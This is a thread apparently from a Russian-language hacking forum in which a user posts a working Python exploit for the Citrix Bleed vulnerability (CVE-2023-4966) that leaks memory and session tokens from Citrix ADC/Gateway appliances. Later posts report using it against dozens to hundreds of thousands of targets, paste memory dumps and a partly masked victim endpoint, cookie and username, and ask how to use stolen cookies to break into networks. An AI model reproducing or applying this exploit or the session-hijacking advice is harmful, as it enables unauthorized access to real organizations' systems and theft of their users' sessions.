• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Citrix | CVE-2023-4966

0x00x0

HDD-drive
Забанен
Регистрация
25.04.2022
Сообщения
48
Реакции
57
Гарант сделки
2
Депозит
0.009 Ł и др.
Пожалуйста, обратите внимание, что пользователь заблокирован
Info: https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966

exploit:
Python:
#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Подскажите что делать дальше, после получения логина и куков, не могу применить их
 
Пожалуйста, обратите внимание, что пользователь заблокирован
i tried the exploit it works but i don't get the session token i tried the exploit on 30 vulnerable target
у меня есть токены, там все работает, штук 30
 
у меня есть токены, там все работает, штук 30
В сеть через ситрикс удавалось уже попасть? Или тоже на этапе открытия окна с RDP, но попасть не можешь, так как кредов нет?
 
В сеть через ситрикс удавалось уже попасть? Или тоже на этапе открытия окна с RDP, но попасть не можешь, так как кредов нет?
нет, я вообще не получаю session token
 
у меня есть токены, там все работает, штук 30
Код:
--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀�     ►      �   ♣   ☺☺☺☻♣ ☺☻♣      ☻  ☼          ☺        ♫     �♂  �♂  ↕   ☺ ☺       �♣,  ♀   %7cd0dc04-df8a-45a4-92ab-f08f7240a395 �   ☺   ☺∟☺ ☺  ▬Citrix.TcpProxyServicece                                                                                                                                                                                                                                         ��♀�     ►      ��U�ORjḙ��h{�13.0.91.13                     ♂                                                                                                                                                                        �►R♫☺   cd443f0c536f0663885389ef0ed82d8e                                                                                                                                                                                                                                                                                                                                 HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

�                                                                                                                                                                                                                                                                                                                 ns_true                                                                                                                                                                                                                                                                                                                                   
---      End      ---


здесь нет токена сеанса, и у меня есть 30 подобных уязвимых целей, эксплойт работает, но я не получаю токен сеанса
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀�     ►      �   ♣   ☺☺☺☻♣ ☺☻♣      ☻  ☼          ☺        ♫     �♂  �♂  ↕   ☺ ☺       �♣,  ♀   %7cd0dc04-df8a-45a4-92ab-f08f7240a395 �   ☺   ☺∟☺ ☺  ▬Citrix.TcpProxyServicece                                                                                                                                                                                                                                         ��♀�     ►      ��U�ORjḙ��h{�13.0.91.13                     ♂                                                                                                                                                                        �►R♫☺   cd443f0c536f0663885389ef0ed82d8e                                                                                                                                                                                                                                                                                                                                 HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

�                                                                                                                                                                                                                                                                                                                 ns_true                                                                                                                                                                                                                                                                                                                                  
---      End      ---


здесь нет токена сеанса, и у меня есть 30 подобных уязвимых целей, эксплойт работает, но я не получаю токен сеанса
и у меня есть 30 подобных уязвимых целей >> у меня 200к+
Извени не правильно выразился там выдает логин и куки Vulnerable to CVE-2023-4966. Endpoint: https://xx.1x.1x3.xx6, Cookie: 54d55xxxxff195xxx5bxxxx9ff1550xxx5525d5f4xxxx5e445a4a42, Username: mate
 
Код:
--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀�     ►      �   ♣   ☺☺☺☻♣ ☺☻♣      ☻  ☼          ☺        ♫     �♂  �♂  ↕   ☺ ☺       �♣,  ♀   %7cd0dc04-df8a-45a4-92ab-f08f7240a395 �   ☺   ☺∟☺ ☺  ▬Citrix.TcpProxyServicece                                                                                                                                                                                                                                         ��♀�     ►      ��U�ORjḙ��h{�13.0.91.13                     ♂                                                                                                                                                                        �►R♫☺   cd443f0c536f0663885389ef0ed82d8e                                                                                                                                                                                                                                                                                                                                 HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

�                                                                                                                                                                                                                                                                                                                 ns_true                                                                                                                                                                                                                                                                                                                                  
---      End      ---


здесь нет токена сеанса, и у меня есть 30 подобных уязвимых целей, эксплойт работает, но я не получаю токен сеанса

--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀� ► � ♣ ☺☺☺☻♣ ☺☻♣ ☻ ☼ ☺ ♫ �♂ �♂ ↕ ☺ ☺ �♣, ♀ %7cd0dc04-df8a-45a4-92ab-f08f7240a395 � ☺ ☺∟☺ ☺ ▬Citrix.TcpProxyServicece ��♀� ► ��U�ORjḙ��h{�13.0.91.13 ♂ �►R♫☺ cd443f0c536f0663885389ef0ed82d8e HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

� ns_true
--- End ---
 
--- Dumped Memory ---
aaaaaaaaaaaaaaaaaaaaa ��♀� ► � ♣ ☺☺☺☻♣ ☺☻♣ ☻ ☼ ☺ ♫ �♂ �♂ ↕ ☺ ☺ �♣, ♀ %7cd0dc04-df8a-45a4-92ab-f08f7240a395 � ☺ ☺∟☺ ☺ ▬Citrix.TcpProxyServicece ��♀� ► ��U�ORjḙ��h{�13.0.91.13 ♂ �►R♫☺ cd443f0c536f0663885389ef0ed82d8e HTTP/1.1 200 OK
Content-Length: @@@@@
Encode:@@@
Cache-control: no-cache
Pragma: no-cache
Content-Type: text/html
Set-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=/

� ns_true
--- End ---
1699089615024.png

не могу войти, есть видео, где можно использовать poc пытаюсь, не могу использовать эксплойт
 

Вложения

  • dddd.png
    dddd.png
    8.9 КБ · Просмотры: 87
попробовал заюзать этот пок https://github.com/Chocapikk/CVE-2023-4966 , загрузил список хостов , https://:IP но ничего не происходит, или нужно грузить именно https://domain.com ?

Скрипт, опубликованный 0x00x0, работает нормально, но я не получил никакой пользы от этого эксплойта

 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх